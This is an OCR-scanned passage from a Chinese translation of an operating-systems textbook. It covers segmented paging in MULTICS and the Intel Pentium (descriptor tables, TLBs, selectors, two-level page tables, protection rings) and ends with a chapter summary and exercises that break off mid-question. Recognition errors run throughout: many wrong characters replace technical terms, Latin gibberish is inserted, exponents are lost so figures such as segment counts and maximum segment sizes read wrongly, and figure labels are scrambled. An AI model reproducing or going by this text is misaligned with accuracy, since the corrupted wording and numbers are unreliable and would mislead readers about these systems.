如 果 一 个 段 比较 大 ， 把 它 整个 保存 在 内 存 中 可 能 很 不 方便 甚至 是 
不 可 能 的 ， 因 此 产生 了 对 它 进 行 分 页 的 想法 。 这 样 ， 只 有 那些 真正 需 
要 的 页 面 才 会 被 调 入 内 存 。 有 几 个 著名 的 系统 实现 了 对 段 进 行 分 页 的 
支持 ， 在 本 市 我 们 将 介绍 第 一 个 实现 了 这 种 支持 的 系统 
MULTICS 。 在 下 一 二 我 们 将 介绍 一 个 更 新 的 例子 
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MULTICSi& 47 4£ Honeywell 6000 计 算 机 和 它 的 一 些 后 继 机 型 上 。 
它 为 每 个 程序 提供 了 最 多 2 个 段 (超过 250 000 个 ) ， 每 个 段 的 虚拟 地 
址 空间 最 长 为 65 536 个 (36 位 ) 字 长 。 为 了 实现 它 ，MULIICS 的 设计 
者 决定 把 每 个 段 都 看 作 是 一 个 虚拟 内 存 并 对 它 进行 分 页 ， 以 结合 分 页 
的 优点 (统一 的 页 面 大 小 和 在 只 使 用 段 的 一 部 分 时 不 用 把 它 全 部 调 入 
内 存 ) 和 分 段 的 优点 (易于 编程 、 模 块 化 、 保 护 和 共享 ) 。 


每 个 MULTICS 程 序 都 有 一 个 段 表 ， 每 个 段 对 应 一 个 描述 符 。 因 为 
段 表 可 能 会 有 大 于 25 万 个 的 表 项 ， 段 表 本 身 也 是 一 个 段 并 被 分 页 。 一 
个 段 插 述 符 包 含 了 一 个 段 是 否 在 内 存 中 的 标志 ， 只 要 一 个 段 的 任何 一 
部 分 在 内 存 中 这 个 段 束 补 认为 是 在 内 存 中 ， 并 且 它 的 页 表 也 会 在 内 存 
中 。 如 末 一 个 段 在 内 存 中 ， 它 的 搬 述 从 将 包含 一 个 18 位 的 指 癌 它 的 页 
表 的 指针 〈 见 图 3-35a) 。 因 为 物理 地 址 是 24 位 并 且 页 面 是 按照 64 字 广 
的 边界 对 齐 的 (这 隐 含 着 页 面 地 址 的 低 6 位 是 000000) ， 所 以 在 描述 符 


中 只 需要 18 位 来 存储 页 表 地 址 。 段 描述 符 中 还 包含 了 段 大 小 、 保 护 位 
以 及 其 他 的 一 些 条 目 。 图 3-35b 一 个 MULTICS 段 描述 符 的 示例 。 段 在 畏 
助 存储 器 中 的 地 址 不 在 段 描述 符 中 ， 而 古 在 缺 段 处 理 程序 使 用 的 男 一 
Nae 


页 面 2 表 项 
页 面 1 表 项 


页 面 0 表 项 


段 6 描述 符 


段 5 描 述 符 段 3 的 页 表 
段 4 描述 符 


段 2 描述 符 
段 1 描 述 符 


页 面 2 表 项 


wy. Ay 
H D 
I Ayr 
H D 
wy Ay 
H D 
段 3 描述 符 
Is /pr 
H D 
I Ayr 
H D 
wy Ay 
H D 


BORE 
描述 符 段 页 面 0 表 项 
段 1 的 页 表 
a) 
18 9 t 3 


7 
Z 


页 面 大 小 : 
0 = 1024 字 

1 = 64 字 
0= 段 是 分 页 的 
1 = 段 是 不 分 页 的 
其 他 位 
保护 位 

b) 


图 3-35 _ MULTICS 的 虚拟 内 存 : a) 描 述 符 段 指 向 页 表 ; b) 一 个 段 描 述 
符 ， 其 中 的 数字 是 各 个 域 的 长 度 


每 个 段 都 是 一 个 普通 的 虚拟 地 址 空间 ， 用 与 本 章 前 面 讨论 过 的 非 
分 段 式 分 页 存储 相同 的 方式 进行 分 页 。 一 般 的 页 面 大 小 是 1024 字 廊 
芯 管 有 一 些 MULTICS 目 己 使 用 的 段 不 分 页 或 以 64 字 下 为 单元 进行 分 
节 


MULTICS 中 一 个 地 址 由 两 部 分 构成 : 段 和 段 内 地 址 。 段 内 地 址 又 
进一步 分 为 页 号 和 页 内 的 字 ， 如 图 3-36 所 示 。 在 进行 内 存 访问 时 ， 执 行 
下 面 的 算法 © 


段 内 地 址 


图 3-36 一 个 34 位 的 MULTICS 虚 拟 地 址 


1) 根 据 段 号 找到 上段 插 述 件 。 


2) 检 查 该 段 的 页 表 是 否 在 内 存 中 。 如 果 在 ， 则 找到 它 的 位 置 ， 如 果 
不 在 ， 则 产生 一 个 段 错 误 。 如 果 访 问 违 反 了 上 段 的 保护 要 求 就 发 出 一 个 
越界 错误 (陷阱 ) 。 


3) 检 查 所 请 求 虚拟 页 面 的 页 表 项 ， 如 琳 该 页 面 不 在 内 存 中 则 产生 一 
个 正 页 中 断 ， 如 下 在 内 存 束 从 页 表 项 中 取出 这 个 页 面 在 内 存 中 的 起 始 
地 址 。 


4) 把 偏 移 量 加 到 页 面 的 起 始 地 址 上 ， 得 到 要 访问 的 字 在 内 存 中 的 地 
Uk 


这 个 过 程 如 图 3-37 所 示 。 为 了 简单 起 见 ， 我 们 忽略 了 描述 符 段 目 己 
也 要 分 页 的 事实 。 实 际 的 过 程 是 通过 一 个 寄存 器 (描述 符 基 址 寄存 
器 ) 找到 描述 符 段 的 页 表 ， 这 个 页 表 指 向 描述 符 段 的 页 面 。 一 旦 找到 
了 所 需 段 的 描述 符 ， 寻 址 过 程 就 如 图 3-37 所 示 。 


MULTICS 虚 拟 地 址 


图 3-37 两 部 分 组 成 的 MULTICS 地 址 到 内 存 地 址 的 转换 


正如 读者 所 想 ， 如 条 对 于 每 条 指令 都 由 操作 系统 来 运行 上 面 所 述 
的 算法 ， 那 么 程序 束 会 运行 得 很 慢 。 实 际 上 ，MULTICS 硬 件 包含 了 16 
个 字 的 高 速 TLB， 对 给 定 的 关键 字 它 能 并 行 搜 索 所 有 的 表 项 ， 如 图 3-38 
所 示 。 当 一 个 地 址 被 送 到 计算 机 时 ， 寻 址 硬件 首 移 检查 虚拟 地 址 全 不 
是 在 TLB 中 。 如 果 在 ， 就 直接 从 TLB 中 取得 页 框 号 并 生成 要 访问 的 字 的 
实际 地 址 ， 而 不 必 到 插 述 符 段 或 页 表 中 去 查找 。 


这 个 表 项 是 

比较 域 否 在 使 用 ? 

a 虚拟 EIF 

段 与 页 面 WAE 保护 时 站 
E 


图 3-38 一 个 人 简化 的 MULTICS 的 TLB， 两 个 页 面 大 小 的 存在 使 得 实 
际 的 TLB 更 复 灯 


TLB 中 保存 着 16 个 最 近 访 问 的 页 的 地 址 ， 工 作 集 小 于 TLB 容 量 的 程 
序 将 随 着 整个 工作 集 的 地 址 被 装 入 TLB 中 而 逐渐 达到 稳定 ， 开 始 高 效 
地 运行 。 如 果 页 面 不 在 TLB 中 ， 才 会 访问 描述 符 和 页 表 以 找 出 页 框 

， 并 更 新 TLB 使 它 包含 这 个 页 面 ， 最 少 使 用 的 页 面 被 淘 状 出 
TLB。 生 存 时 间 位 跟踪 哪个 表 项 是 最 近 最 少 使 用 的 。 之 所 以 使 用 TLB 古 
为 了 并 行 地 比较 所 有 表 项 的 段 号 和 页 号 


3.7.3 “分 段 和 分 页 结合 : Intel Pentium 


Pentium 处 理 璐 的 虚拟 内 存在 许多 方面 都 气 MULTICS 类 似 ， 其 中 包 
括 既 有 分 段 机 制 又 有 分 页 机 制 。MULTICS 有 256K 个 独立 的 段 ， 每 个 段 
最 长 可 以 有 64K 个 36 位 字 。Pentium 处 理 器 有 16K 个 独立 的 段 ， 每 个 段 最 
多 可 以 容纳 10 亿 个 32 位 字 。 这 里 虽然 段 的 数目 较 少 ， 但 是 相 比 之 下 
Pentium 较 大 的 段 大 小 特征 比 更 多 的 段 个 数 要 重要 得 多 ， 因 为 儿 乎 没有 
程序 需要 1000 个 以 上 的 段 ， 但 是 有 很 多 程序 需要 大 段 。 


Pentium 处 理 器 中 虚拟 内 存 的 核心 是 两 张 表 ， 即 LDT (Local 
Descriptor Table， 局 部 描述 符 表 ) 和 GDT (Global Descriptor Table， 全 
局 描述 符 表 ) 。 每 个 程序 都 有 自己 的 LDT， 但 是 同一 台 计 算 机 上 的 所 
有 程序 共享 一 个 GDT。LDT 描 述 局 部 于 每 个 程序 的 段 ， 包 括 其 代码 、 
数据 、 堆 栈 等 ，GDT 描 述 系统 段 ， 包 括 操作 系统 本 吴 。 


为 了 访问 一 个 段 ， 一 个 Pentium 程 序 必 须 把 这 个 段 的 选择 子 
(selector) 装 入 机 妖 的 6 个 段 寄存 絮 的 某 一 个 中 。 在 运行 过 程 中 ，CS 寄 
存 右 保存 代码 段 的 选择 子 ，DS 寄 存 右 保存 数据 段 的 选择 子 ， 其 他 的 段 
寄存 郁 不 太 重 要 。 每 个 选择 子 是 一 个 16 位 数 ， 如 图 3-39 所 示 。 


; 
0 = GDT/1 = LDT 特权 级 (0 一 3) 


图 3-39 _ Pentium 处 理 器 中 的 选择 子 


选择 子 中 的 一 位 指出 这 个 段 是 局 部 的 还 是 全 局 的 〈 即 它 是 在 LDT 
中 还 是 在 GDT 中 ) ， 其 他 的 13 位 是 LDT 或 GDT 的 表 项 编号 。 因 此 ， 这 
些 表 的 长 度 被 限制 在 最 多 容纳 8K 个 段 描 述 符 。 还 有 两 位 和 保护 有 关 ， 
我 们 将 在 后 面 讨 论 。 描 述 符 0 是 禁止 使 用 的 ， 它 可 以 被 安全 地 装 入 一 个 
段 寄 存 响 中 用 来 表示 这 个 段 寄存 器 目前 不 可 用 ， 如 有 果 使 用 会 引起 一 次 
陷阱 。 


在 选择 子 极 痛 入 段 寄 存 邵 时 ， 对 应 的 质 述 符 被 从 LDT 或 GDT 中 取 
出 装 入 微 程 序 寄存 器 中 ， 以 便 快 速 地 访问 。 一 个 描述 符 由 8 个 字 节 构 
成 ， 包 括 段 的 基地 址 、 大 小 和 其 他 信息 ， 如 图 3-40 所 示 。 


0: 段 不 在 内 存 中 


0: 16 位 段 
1: 32 位 段 |1: 段 在 内 存 中 
特权 级 (0 一 3) 
0: RAKE 


0: Limit 以 字 节 为 单位 
1: Limit 以 页 面 为 单位 ， 1: 应 用 程 
段 类 型 及 保护 


H PPr 
Base 24~31 |G A Himi DPL|S| Type Base 16~23 |4 
A 16~19 


Limit 0 一 15 


Base 0 一 15 
= 相对 地 址 


32 位 


一 


图 3-40 Pentium 处 理 器 代码 段 描 述 符 (数据 段 稍 有 不 同 ) 


选择 子 的 格式 经 过 合理 设计 ， 使 得 根据 选择 子 定 位 描述 符 十 分 方 
便 。 首 先 根据 第 2 位 选择 LDT 或 GDT; 随后 选择 子 被 复制 进 一 个 内 部 擦 
除 寄存 器 中 并 且 它 的 低 3 位 被 清 0; 最 后 ，LDT 或 GDT 表 的 地 址 被 加 到 
它 上 面 ， 得 出 一 个 直接 指向 描述 符 的 指针 。 例 如 ， 选 择 子 72 指 向 GDT 
的 第 9 个 表 项 ， 它 位 于 地 址 GDT+72。 


现在 让 我 们 跟踪 一 个 描述 地 址 的 (选择 子 ， 偏 移 量 ) 二 元 组 被 转 
换 为 物理 地 址 的 过 程 。 微 程序 知道 我 们 具体 要 使 用 哪个 段 寄 存 器 后 ， 
它 就 能 从 内 部 寄存 器 中 找到 对 应 于 这 个 选择 子 的 完整 的 描述 符 。 如 采 
段 不 存在 (选择 子 为 0) 或 已 被 换 出 ， 则 会 发 生 一 次 陷阱 。 


硬件 随后 根据 Limit (RKE) 域 检查 偏 移 量 是 否 超 出 了 段 的 结 
尾 ， 如 果 是 ， 也 发 生 一 次 陷阱 。 从 逻辑 上 来 说 ， 在 描述 符 中 应 该 简单 
地 有 一 个 32 位 的 域 给 出 段 的 大 小 ， 但 实际 上 剩余 20 位 可 以 使 用 ， 因 此 
采用 了 一 种 不 同 的 方案 。 如 果 Gbit (Granularity) 域 是 0， 则 是 精确 到 


字 节 的 段 长 度 ， 最 大 LIMB; 如果 是 1，Limit 域 以 页 面 替 代 字 节 作 为 单元 
给 出 段 的 大 小 。Pentium 处 理 絮 的 页 面 大 小 是 固定 的 4KB， 因 此 20 位 足 


以 描述 最 大 23 字 市 的 段 。 


假设 段 在 内 存 中 并 且 偏 移 量 也 在 范围 内 ，Pentium 处 理 器 接着 把 描 
述 符 中 32 位 的 基 址 和 偏 移 量 相 加 形成 线性 地 址 (linear address) ， 如 图 
3-41 所 示 。 为 了 和 只 有 24 位 基 址 的 286 兼 容 ， 基 址 被 分 为 3 片 分 布 在 描述 
符 的 各 个 位 置 。 实 际 上 ， 基 址 允许 每 个 段 的 起 始 地 址 位 于 32 位 线性 地 
址 空间 内 的 任何 位 置 。 


描述 符 


段 长 度 


32 位 线性 地 址 


图 3-41 ORTF, MEE) 对 转换 为 线性 地 址 


如 果 禁 止 分 页 (通过 全 局 控制 寄存 器 中 的 一 位 ) ， 线 性 地 址 就 被 
解释 为 物理 地 址 并 被 送 往 存储 右 用 于 读 写 操作 。 因 此 在 茶 止 分 页 时 ， 


我 们 束 得 到 了 一 个 纯 的 分 段 方 案 。 各 个 段 的 基 址 在 它 的 描述 符 中 。 
外 ， 段 之 间 人 允许 互 相 获 盖 ， 这 可 能 是 因为 验证 所 有 的 段 部 互 不 重合 太 
Jie LAN Be AST] ZR ° 


一 方面 ， 如 果 人 允许 分 页 ， 线 性 地 址 将 通过 页 表 映 射 到 物理 地 
址 ， 很 像 我 们 前 面 讲 过 的 例子 。 这 里 惟一 真正 复 浅 的 是 在 32 位 虚拟 地 
址 和 4KB 页 的 情况 下 ， 一 个 段 可 能 包含 多 达 100 万 个 页 面 ， 因 此 使 用 了 
一 种 两 级 映射 ， 以 便 在 段 较 小 时 减 小 页 表 大 小 。 


每 个 运行 程序 都 有 一 个 由 1024 个 32 位 表 项 组 成 的 页 目录 (page 
directory) 。 它 通过 一 个 全 局 寄存 器 来 定位 。 这 个 目录 中 的 每 个 目录 项 
都 指向 一 个 也 包含 1024 个 32 位 表 项 的 页 表 ， 页 表 项 指向 页 框 ， 这 个 方 
案 如 图 3-42 所 示 。 


线性 地 址 


页 目录 页 表 


页 表 表 项 指 
向 字 


目录 项 指向 页 表 


b) 


图 3-42 线性 地 址 到 物理 地 址 的 映射 


在 图 3-42a 中 我 们 看 到 线性 地 址 被 分 为 三 个 域 ， Ae + TA ie 
量 。 目 邓 域 个 作为 索引 在 页 目 隶 中 找到 指 癌 正 确 的 页 表 的 指针 ， 随 后 
页 面 域 被 用 作 索 引 在 页 表 中 找到 页 框 的 物理 地 址 ， 最 后 ， 俩 移 量 和 被 加 
到 页 框 的 地 址 上 得 到 需要 的 字 市 或 子 的 物理 地 址 。 


每 个 页 表 项 是 32 位 ， 其 中 20 位 是 页 框 号 。 其 余 的 位 包含 了 由 硬件 
设置 供 操作 系统 使 用 的 访问 位 和 “ 脏 ” 位 、 保 护 位 和 一 些 其 他 有 用 的 


位 。 


每 个 页 表 有 描述 1024 个 4KB 页 框 的 表 项 ， 因 此 一 个 页 表 可 以 处 理 
4MB 的 内 存 。 一 个 小 于 4MB 的 段 的 页 目录 中 将 只 有 一 个 表 项 ， 这 个 表 


项 指 疝 一 个 惟一 的 页 表 。 通 过 这 种 方法 ， 长 度 短 的 段 的 开销 只 是 两 个 
页 面 ， 而 不 是 一 级 页 表 时 的 100 万 个 页 面 。 


为 了 避免 重复 的 内 存 访问 ，Pentium 处 理 器 和 MULTICS 一 样 ， 也 有 
一 个 小 的 TLB 把 最 近 使 用 过 的 “目录 -页 面 * 二 元 组 映射 为 页 框 的 物理 地 
址 。 只 有 在 当前 组 合 不 在 TLB 中 时 ， 图 3-42 所 示 的 机 制 才 被 真正 执行 并 
更 新 TLB。 只 要 TLB 的 缺失 率 很 低 ， 则 性 能 就 不 错 。 


还 有 一 点 值得 注意 ， 如 果 某 些 应 用 程序 不 需要 分 段 ， 而 是 需要 一 
个 单独 的 、 分 页 的 32 位 地 址 空间 ， 这 样 的 模式 是 可 以 做 到 的 。 这 时 ， 
所 有 的 段 寄 存 器 可 以 用 同一 个 选择 子 设置 ， 其 描述 符 中 基 址 设 为 0， 段 
长 度 被 设置 为 最 大 。 指 令 偏 移 量 会 是 线性 地 址 ， 只 使 用 了 一 个 地 址 空 
间 一 一 效果 上 就 是 正常 的 分 页 。 事 实 上 ， 所 有 当前 的 Pentium 操 作 系统 
都 是 这 样 工作 的 。0S/2 是 惟一 一 个 使 用 Intel MMU 体 系 结构 所 有 功能 的 
操作 系统 。 


不 管 怎么 说 ， 我 们 不 得 不 称赞 Pentium 处 理 器 的 设计 者 ， 因 为 他 们 
面 对 的 是 互相 冲突 的 目标 ， 实 现 纯 的 分 页 、 纯 的 分 段 和 段 页 式 管 理 ， 
同时 还 要 与 286 兼 容 ， 而 他 们 高 效 地 实现 了 所 有 的 目标 ， 最 终 的 设计 非 


种 简洁。 


尽管 我 们 已 经 简单 地 讨论 了 Pentium 人 处 理 器 虚拟 内 存 的 全 部 体系 机 
制 ， 关 于 保护 我 们 还 是 值得 再 说 几 名 的， 因为 它 和 虚拟 内 存 联系 很 紧 


密 。 和 虚拟 内 存 一 样 ，Pentium 处 理 絮 的 保护 系统 与 MULTICS 很 类 似 。 
E 


支持 4 个 保护 级 ，0 级 权限 最 高 ，3 级 最 低 ， 如 图 3-43 所 示 。 在 任何 时 


刻 ， 运 行程 序 都 处 在 由 PSW 中 的 两 位 域 所 指出 的 某 个 保护 级 上 ， 系 统 
中 的 每 个 段 也 有 一 个 级 别 。 


保护 级 的 
典型 应 用 


级 


图 3-43 ”Pentium 的 保护 机 制 


当 程 序 只 使 用 与 它 同 级 的 段 时 ， 一 切 都 会 很 正常 。 对 更 高 级 别 数 
据 的 存 取 是 允许 的 ， 但 是 对 更 低级 别 的 数据 的 存 取 古 非法 的 并 会 引起 
陷阱 。 调 用 不 同 级 别 (更 高 或 更 低 ) 的 过 程 是 允许 的 ， 但 是 要 通过 一 
种 被 严格 控制 的 方式 来 进行 。 为 执行 越级 调用 ，CALL 指 令 必须 包含 一 


个 选择 子 而 不 单单 是 一 个 地 址 。 选 择 子 指向 一 个 称 为 调用 门 (call 
gate) 的 描述 符 ， 由 它 给 出 被 调用 过 程 的 地 址 。 因 此 ， 要 跳 转 到 任何 一 
个 不 同 级 别 的 代码 段 的 中 间 都 是 不 可 能 的 ， 只 有 正式 指定 的 入 口 点 可 
以 使 用 。 保 护 级 和 调用 门 的 概念 来 自 MULTICS， 在 那里 它们 被 称 为 保 
护 环 (protection ring) ° 


这 个 机 制 的 一 种 典型 的 应 用 如 图 3-43 所 示 。 在 0 级 古 操 作 系统 
核 ， 处 理 MO、 存储 管 理 和 其 他 关键 的 操作 。 在 1 级 是 系统 调用 处 理 程 
序 ， 用 户 程序 可 以 通过 调用 这 里 的 过 程 执 行 系统 调用 ， 但 是 只 有 一 些 
特定 的 和 受 保护 的 过 程 可 以 被 调用 。 在 2 级 是 库 过 程 ， 它 可 能 古 由 很 多 
正在 运行 的 程序 共享 的 。 用 户 程序 可 以 调用 这 些 过 程 ， 读 取 它 们 的 数 
据 ， 但 是 不 能 修改 它们 。 最 后 ， 运 行 在 3 级 上 的 用 户 程序 受到 的 保护 最 


少 。 


陷阱 和 中 断 使 用 了 一 种 和 调用 门类 似 的 机 制 。 写 们 访问 的 也 坪 摘 
述 符 而 不 是 绝对 地 址 ， 而 且 这 些 描述 符 指 同 将 被 执行 的 特定 的 过 程 。 
图 3-40 中 的 Type 域 用 于 区 别 代码 段 、 数 据 段 和 各 种 类 型 的 门 。 


3.8 AKT EHH 


存储 管理 ， 特 别 是 页 面 置 换算 法 ， 曾 经 是 一 个 成 果 丰 硕 的 研究 领 
域 ， 但 这 些 成 果 中 大 部 分 好 像 已 经 销声匿迹 了 ， 至 少 对 通用 系统 来 说 
是 这 样 的 。 很 多 实时 系统 试图 使 用 时 钟 算法 的 某 些 变 体 ， 因 为 它 容易 
实现 而 且 相 对 高 效 。 但 最 近 有 了 一 个 例外 ， 这 就 是 对 4.4 BSD 中 虚拟 内 
存 的 重新 设计 (Cranor 和 Parulkar，1999) 


现在 仍 有 一 些 关 于 新 式 系统 的 分 页 研究 在 进行 。 例 如 ， 手 机 和 
PDA 已 成 为 小 型 的 个 人 电脑 ， 其 中 很 多 将 RAM 分 页 到 “磁盘 ”上 ， 所 不 
同 的 是 手机 的 磁盘 是 内 存 ， 和 旋转 磁性 盘 相 比 有 不 同 的 特性 。 据 Park 
等 人 (2004b) 报道 (In 等 人 ，2007; Joo 等 人 ，2006; Part 等 人 ， 
2004a) 。Part 等 人 (2004b) 近期 的 一 些 工作 还 着 眼 于 针对 移动 设备 
的 能 源 敏感 型 的 需求 分 页 技术 。 


关于 分 页 性 能 的 研究 也 在 进行 (Albers 等 人 ，2002;Burton 和 
Kelly，2003;Cascaval 等 人 ，2005;Panagiotou 和 Souza，2006;Peserico， 
2003) 。 人 研究 的 兴趣 还 包括 对 多 媒体 系统 (Dasigenis 等 人 ， 
2001;Hand, 1999) 和 实时 系统 (Pizlo 和 Vitek，2006) 的 存储 器 管 
HH ie 


3.9 小结 


本 章 中 我 们 考察 了 存储 管理 。 我 们 看 到 在 最 简单 的 系统 中 是 根本 
没有 任何 交换 或 分 页 的 。 一 旦 一 个 程序 狠 入 内 存 ， 它 将 一 直 在 内 存 中 
运行 直到 完成 。 一 些 操作 系统 在 同一 时 刻 只 允许 一 个 进程 在 内 存 中 运 
行 ， 而 另 一 些 操 作 系统 文 持 多 道 程 序 设 计 。 


接 下 来 是 区 换 技术 。 系 统 通 过 交换 技术 可 以 同时 运行 总 内 存 占用 
超过 物理 内 存 大 小 的 多 个 进程 ， 如 采 一 个 进程 没有 内 存 空间 可 用 ， 它 
将 会 被 换 到 磁 副 上 。 内 存 和 磁盘 上 的 空闲 空间 可 以 使 用 位 图 或 空闲 区 
列表 来 记录 。 


现代 计算 机 都 有 茶 种 形式 的 虚拟 内 存 。 在 最 简单 的 形式 中 ， 每 一 
个 进程 的 地 址 空间 被 划分 为 同等 大 小 的 块 ， 称 为 页 面 ， 页 面 可 以 被 放 
入 内 存 中 任何 可 用 的 页 框 内 。 有 多 种 页 面 置换 算法 ， 其 中 两 个 比较 好 
的 算法 是 老化 算法 和 工作 集 时 钟 算 法 。 


为 了 使 分 页 系统 工作 民 好 ， 仪 选择 算法 是 不 够 的 ， 还 要 关注 诸如 
工作 集 的 确定 、 存 储 器 分 配 策略 以 及 所 需要 的 页 面 大 小 等 问题 。 


分 段 可 以 帮助 处 理 在 执行 过 程 中 大 小 有 变化 的 数据 结构 ， 并 能 简 
化 连接 和 共 诗 。 分 段 还 有 利于 为 不 同 的 段 提供 不 同 的 保护 。 有 时 ， 可 


以 把 分 段 和 分 页 结合 起 来 ， 以 提供 一 种 二 维 的 虚拟 内 存 。MULTICS 系 
统 以 及 Intel Pentium 都 是 这 样 既 支 持 分 段 也 支持 分 页 的 系统 。 


习题 


1. 在 图 3-3 中 基 址 和 界限 寄存 器 售 有 相同 的 值 16 384， 这 是 巧合 ， 
还 是 它们 总 是 相等 ? 如 果 这 只 是 巧合 ， 为 什么 在 这 个 例子 里 它们 是 相 


还 
等 的 ? 


> 


2. 交 换 系 统 通过 紧缩 来 消除 空 帮 区 。 假 设 有 很 多 空间 区 和 数据 段 
随机 分 布 ， 并 且 读 或 写 32 位 长 的 字 需 要 10ns 的 时 间 ， 紧 缩 128MB 大 概 
需要 多 长 时 间 ? 为 了 简单 起 见 ， 假 设 空间 区 中 含有 字 0， 内 存 中 最 高 地 
址 处 含有 有 效 数 据 。 


3. 请 比较 用 位 图 和 链表 两 种 方法 来 记录 空 闪 内 存 所 需 的 存储 空 
间 。128MB 的 内 存 以 n 字 节 为 单元 分 配 ， 对 于 链表 ， 假 设 内 存 中 数据 
段 和 空闲 区 交替 排列 ， 长 度 均 为 64KB。 并 假设 链表 中 的 每 个 结 点 需要 
32 位 的 内 存 地 址 、16 位 长 度 和 16 位 下 一 结 点 域 。 这 两 种 方法 分 别 需要 
多 少 字 节 的 存储 空间 ? 哪 种 方法 更 好 ? 


4. 在 一 个 交换 系统 中 ， 按 内 存 地 址 排列 的 空闲 区 大 小 是 : 10KB、 
4KB、20KB、18KB、7KB、9KB、12KB 和 15KB。 对 于 连续 的 段 请 
求 : a)12KB; b)10KB; Q9KB。 使 用 首次 适 配 算法 ， 将 找 出 哪个 空闲 
X? 使 用 最 佳 适 配 、 最 差 适 配 、 下 次 适 配 算法 昵 ? 


5. 对 下 面 的 每 个 十 进 制 虚拟 地 址 ， 分 别 使 用 4KB 页 面 和 8KB 页 面 计 
算 虚 拟 页 号 和 偏 移 量 : 20000, 32768, 60000 ° 


6.Intel 8086 处 理 絮 不 支持 虚拟 内 存 ， 然 而 一 些 公 司 曾经 设计 过 包 
售 未 作 任 何 改动 的 8086 CPU 的 分 页 系统 。 猜 想 一 下 ， 他 们 是 如 何 做 到 
这 一 点 的 。 提 示 : 考虑 MMU 的 逻辑 位 置 。 


7. 考 虑 下 面 的 C 程 序 : 


int X[N]; 
int step=M;//M 是 某 个 预定 义 的 常量 
for(int i=0;i<N;i+=step)X[i]=X[i]+1; 


a) 如 果 这 个 程序 运行 在 一 个 页 面 大 小 为 4KB 且 有 64 个 TLB 表 项 的 
机 器 上 时 ，M 和 N 取 什么 值 会 使 得 内 层 循环 的 每 次 执行 都 会 引起 TLB 失 
效 ? 


b) 如 果 循 环 重复 很 多 遍 ， 结 果 会 和 a) 的 答案 相同 吗 ? 请 解释 。 


8. 存 储 页面 必 须 可 用 的 人 ”c 副 空间 和 下 列 因素 有 关 : 最 大 进程 数 n， 
虚拟 地 址 空间 的 字 世 数 v，RAM 的 字 世 数 r。 给 出 最 坏 情况 下 磁盘 空间 
需求 的 表达 式 。 这 个 数量 的 真实 性 如 何 ? 


9 一 个 机 器 有 32 位 地 址 空间 和 8KB 页 面 ， 页 表 完 全 用 硬件 实现 ， 
页 表 的 每 一 表 项 为 一 个 32 位 字 。 进 程 局 动 时 ， 以 每 个 子 100ns 的 速度 将 


页 表 从 内 存 复制 到 硬件 中 。 如 果 每 个 进程 运行 100 ms (包含 装 入 页 表 
的 时 间 ) ， 用 来 装 入 页 表 的 CPU 时 间 的 比例 是 多 少 ? 


10. 假 设 一 个 机 器 有 48 位 的 虚拟 地 址 和 32 位 的 物理 地 址 。 


al 假设 页 面 大 小 是 4KB， 如 果 只 有 一 级 页 表 ， 那 么 在 页 表 里 有 多 
少 页 表 项 ? 请 解释 。 

b) 假 设 同一 系统 有 32 个 TLB 表 项 ， 并 且 假 设 一 个 程序 的 指令 正好 
能 放 入 一 个 页 ， 并 且 该 程序 顺序 地 从 有 数 干 个 页 的 数组 中 读 取 长 整 型 
元 素 。 在 这 种 情况 下 TLB 的 效果 如 何 ? 


11. 假 设 一 个 机 器 有 38 位 的 虚拟 地 址 和 32 位 的 物理 地 址 。 


a) 与 一 级 页 表 比 较 ， 多 级 页 表 的 主要 优点 是 什么 ? 


b) 一 个 有 16KB 个 页 、4 子 广 表 项 的 二 级 页 表 ， 应 该 对 第 一 级 页 表 
域 分 配 多 少 位 ， 对 第 二 级 页 表 域 分 配 多 少 位 ? 请 解释 原因 。 

12. 一 个 32 位 地 址 的 计算 机 使 用 两 级 页 表 。 虚 拟 地 址 被 分 成 9 位 的 
顶级 页 表 域 、11 位 的 二 级 页 表 域 和 一 个 侦 移 量 ， 页 面 大 小 是 多 少 ? 在 
地 址 空间 中 一 共有 多 少 个 页 面 ? 


13. 假 设 一 个 32 位 虚拟 地 址 被 分 成 a、b、c、d 四 个 域 。 前 三 个 域 用 
于 一 个 三 级 页 表 系 统 ， 第 四 个 域 d 是 侦 移 量 。 页 面 数 与 这 四 个 域 的 大 小 


都 有 关系 吗 ? 如 有 果 不 是 ， 与 哪些 因素 有 关 以 及 与 哪些 因素 无 关 ? 


14. 一 个 计算 机 使 用 32 位 的 虚拟 地 址 ，4KB 大 小 的 页 面 。 程 序 和 数 
据 都 位 于 最 低 的 页 面 "0~4095) ， 堆 栈 位 于 最 高 的 页 面 。 如 果 使 用 传 
A (一 级 ) 分 页 ， 页 表 中 需要 多 少 个 表 项 ? 如 果 使 用 两 级 分 页 ， 每 部 


分 有 10 位 ， 需 要 多 少 个 页 表 项 ? 


15. 一 台 计 算 机 的 进程 在 其 地 址 空间 有 1024 个 页 面 ， 页 表 保 存在 内 
存 中 。 从 页 表 中 读 取 一 个 字 的 开销 是 5ns。 为 了 减 小 这 一 开销 ， 该 计算 
机 使 用 了 TLB， 它 有 32 个 (虚拟 页 面 ， 物 理 页 框 ) 对， 能 在 1ns 内 完成 
查找 。 请 问 把 平均 开销 降 到 2ns 需 要 的 命中 率 是 多 少 ? 


16.VAX 机 中 的 TLB 中 没有 包含 R 位 ， 为 什么 ? 


17.TLB 需 要 的 相 联 存储 设备 如 何 用 硬件 实现 ， 这 种 设计 对 扩展 性 
意味 着 什么 ? 


18. 一 台 机 器 有 48 位 虚拟 地 址 和 32 位 物理 地 址 ， 页 面 大 小 是 8KB， 
试问 页 表 中 需要 多 少 个 表 项 ? 


19 一 个 计算 机 的 页 面 大 小 为 8KB， 内 存 大 小 为 256KB， 虚 拟 地 址 
空间 为 64GB， 使 用 倒 排 页 表 实 现 虚 拟 内 存 。 为 了 保证 平均 散 列 链 的 长 
度 小 于 1， 散 列表 应 该 多 大 ? 假设 散 列 表 的 大 小 为 2 的 需 。 


20. 一 个 学 生 在 编译 器 设计 课程 中 向 教授 提议 了 一 个 项 目 ， 编 写 一 
个 编译 器 ， 用 来 产生 页 面 访问 列表 ， 该 列表 可 以 用 于 实现 最 优 页 面 轩 
换算 法 。 试 问 这 是 否 可 能 9 为 什么 ? 有 什么 方法 可 以 改进 运行 时 的 分 
页 效率 ? 


21. 假 设 虚 拟 页 码 索 引流 中 有 一 些 长 的 页 码 索引 序列 的 重复 ， 序 列 
之 后 有 时 会 是 一 个 随机 的 页 码 索引 。 例 如 ， 序 列 0，1，.…，511， 
431，0，1，...，511，332，0，1，... 中 就 包含 了 0，1，...，511 的 重 
复 ， 以 及 跟随 在 它们 之 后 的 随机 页 码 索 3 引 431 和 332 ° 


a) 在 工作 负载 比 该 序列 短 的 情况 下 ， 标 准 的 页 面 置换 算法 
